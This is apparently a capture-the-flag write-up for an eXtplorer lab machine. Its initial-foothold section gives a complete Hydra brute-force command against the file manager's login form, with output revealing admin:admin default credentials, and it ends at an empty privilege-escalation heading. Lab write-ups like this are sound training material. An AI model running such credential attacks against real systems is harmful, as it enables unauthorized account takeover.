# Extplorer

## Initial Foothold

```
┌──(joe㉿kali)-[~/hax/pg/extplorer]
└─$ hydra extplorer.offsec http-post-form "/filemanager/index.php:option=com_extplorer&action=login&type=extplorer&username=^USER^&password=^PASS^&lang=english:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:109.0) Gecko/20100101 Firefox/115.0:H=Accept\: */*:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=X-Requested-With\: XMLHttpRequest:H=Content-Type\: application/x-www-form-urlencoded; charset=UTF-8:H=Origin\: http\://extplorer.offsec:H=Connection\: close:H=Referer\: http\://extplorer.offsec/filemanager/index.php:H=Cookie\: eXtplorer=98HzE7oQRMcARXO6A7ujHFaBc9ep4R0f:Login failed, try again." -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-03 10:53:02
[INFO] Using HTTP Proxy: http://localhost:8080
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking http-post-form://extplorer.offsec:80/filemanager/index.php:option=com_extplorer&action=login&type=extplorer&username=^USER^&password=^PASS^&lang=english:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:109.0) Gecko/20100101 Firefox/115.0:H=Accept\: */*:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding: gzip, deflate:H=X-Requested-With\: XMLHttpRequest:H=Content-Type\: application/x-www-form-urlencoded; charset=UTF-8:H=Origin\: http\://extplorer.offsec:H=Connection\: close:H=Referer\: http\://extplorer.offsec/filemanager/index.php:H=Cookie\: eXtplorer=98HzE7oQRMcARXO6A7ujHFaBc9ep4R0f:Login failed, try again.
[80][http-post-form] host: extplorer.offsec   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-03 10:53:04
```

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FUZt458SsIGCdXQ6lqtQ8%2Fimage.png?alt=media&#x26;token=21daacdd-e5dd-486f-9875-420d4c52a5e3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FKtuv6Yqg2HtD8rlCXFhQ%2Fimage.png?alt=media&#x26;token=607e50e2-eeb9-4e93-9cc3-f5c1cbd4f078" alt=""><figcaption></figcaption></figure>

## Privilege Escalation